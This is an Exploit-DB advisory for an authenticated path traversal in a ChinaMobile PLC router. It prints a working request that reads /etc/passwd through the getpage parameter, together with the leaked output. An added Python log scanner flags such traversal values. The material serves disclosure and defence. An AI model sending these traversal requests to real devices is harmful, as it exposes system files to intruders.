PLC Wireless Router GPN2.4P21-C-CN – Arbitrary File Disclosure

  • Author: Rahul Raz
    Date: 2016-08-29
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/40304/
  • # Exploit Title: PLC Wireless Router GPN2.4P21-C-CN Authorised Arbitrary File Disclosure
    # Date: 28/08/2016
    # Exploit Author: Rahul Raz
    # Affected Model : GPN2.4P21-C-CN(Firmware- W2001EN-00
    # Vendor: ChinaMobile
    # Tested on: Ubuntu Linux
    _____________________________________________________
    
    GET /cgi-bin/webproc?getpage=../../../etc/passwd&var:language=en_us&var:menu=setup&var:page=connected
    Host: 192.168.59.254
    User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:48.0) Gecko/20100101 Firefox/48.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Cookie: sessionid=64857d81
    Connection: keep-alive
    
    Response
    HTTP/1.0 200 OK
    Connection: close
    Content-Type: text/html
    Pragma: no-cache
    Cache-Control: no-cache
    Set-Cookie: sessionid=64857d81; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
    
    
    #root:x:0:0:root:/root:/bin/bash
    #root:x:0:0:root:/root:/bin/sh
    #root:x:0:0:root:/root:/usr/bin/cmd
    #tw:x:504:504::/home/tw:/bin/bash
    #tw:x:504:504::/home/tw:/bin/msh
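
A log check for the request shown above, as an added example that is not part of the original advisory: it flags `getpage` values sent to `/cgi-bin/webproc` that are absolute or normalise to a path above their base directory. The combined access-log format, the benign `html/index.html` value and the sample lines are assumptions constructed for illustration.

```python
import posixpath
import re
from urllib.parse import parse_qsl, unquote, urlsplit

ENDPOINT = "/cgi-bin/webproc"  # CGI path shown in the advisory
PARAM = "getpage"              # parameter shown in the advisory
# Request field of a combined-format access log entry (assumed log format).
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+)(?: HTTP/[\d.]+)?"')

# Constructed sample log lines, not captured from a real device.
SAMPLE_LOG = [
    '192.168.59.10 - - [29/Aug/2016:10:00:01 +0000] "GET /cgi-bin/webproc?getpage=html/index.html&var:menu=setup HTTP/1.1" 200 5120',
    '192.168.59.10 - - [29/Aug/2016:10:00:07 +0000] "GET /cgi-bin/webproc?getpage=../../../etc/passwd&var:language=en_us&var:menu=setup&var:page=connected HTTP/1.1" 200 310',
    '192.168.59.10 - - [29/Aug/2016:10:00:09 +0000] "GET /cgi-bin/webproc?getpage=%2e%2e%2f%2e%2e%2fetc%2fpasswd HTTP/1.1" 200 310',
]

def fully_decode(value, max_rounds=5):
    """Percent-decode repeatedly so nested encodings reduce to plain text."""
    for _ in range(max_rounds):
        value, previous = unquote(value), value
        if value == previous:
            break
    return value

def escapes_base(value):
    """True if the value is absolute, holds a NUL, or normalises above its base."""
    path = fully_decode(value).replace("\\", "/")
    if "\x00" in path or path.startswith("/"):
        return True
    norm = posixpath.normpath(path)
    return norm == ".." or norm.startswith("../")

def suspicious_getpage(target):
    """Return the decoded getpage value if it escapes its base, else None."""
    parts = urlsplit(target)
    if parts.path != ENDPOINT:
        return None
    for key, value in parse_qsl(parts.query, keep_blank_values=True):
        if key == PARAM and escapes_base(value):
            return fully_decode(value)
    return None

def scan(log_lines):
    """Yield (line_number, decoded_value) for each flagged log line."""
    for n, line in enumerate(log_lines, 1):
        m = REQUEST_RE.search(line)
        hit = suspicious_getpage(m.group(1)) if m else None
        if hit is not None:
            yield n, hit
```

The same `escapes_base` test applies server-side: a handler that rejects any `getpage` value for which it returns true never opens a file outside its page directory.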